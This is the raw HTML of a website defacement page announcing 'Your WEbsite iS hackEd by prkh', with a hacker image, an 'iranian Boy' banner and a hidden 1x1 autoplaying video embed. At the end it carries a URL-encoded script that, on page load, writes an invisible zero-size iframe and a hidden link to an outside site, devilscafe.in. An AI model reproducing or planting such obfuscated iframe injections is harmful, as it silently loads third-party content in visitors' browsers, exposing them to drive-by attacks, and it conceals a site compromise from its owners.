<html><head></style><embed src="http://www.youtube.com/v/hZsaPu-kthY&hl=en_US&loop=1&feature=related&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
<title>Hacked by PRKH(MusTaFa)</title></head><body background="http://www.madtomatoe.com/wp-content/uploads/2010/11/matrix-animated-image.gif"></body><center><h1 style=color:red;> iranian Boy </h1><h2 style=color:green;> Your WEbsite iS hackEd by prkh </h4><img  src="http://3.bp.blogspot.com/-WYL_xsCOb8o/TsSKzTGbnuI/AAAAAAAAASE/VoyntSKwf70/s1600/Hacker.png"><h3 style=color:grey; >***** ƖƦƛƝƖƛƝ ƁƠƳ ******</h1><p style=color:grey; > Dont forgive  </p></center></html><script>
<!--
document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E"));
//-->
</script>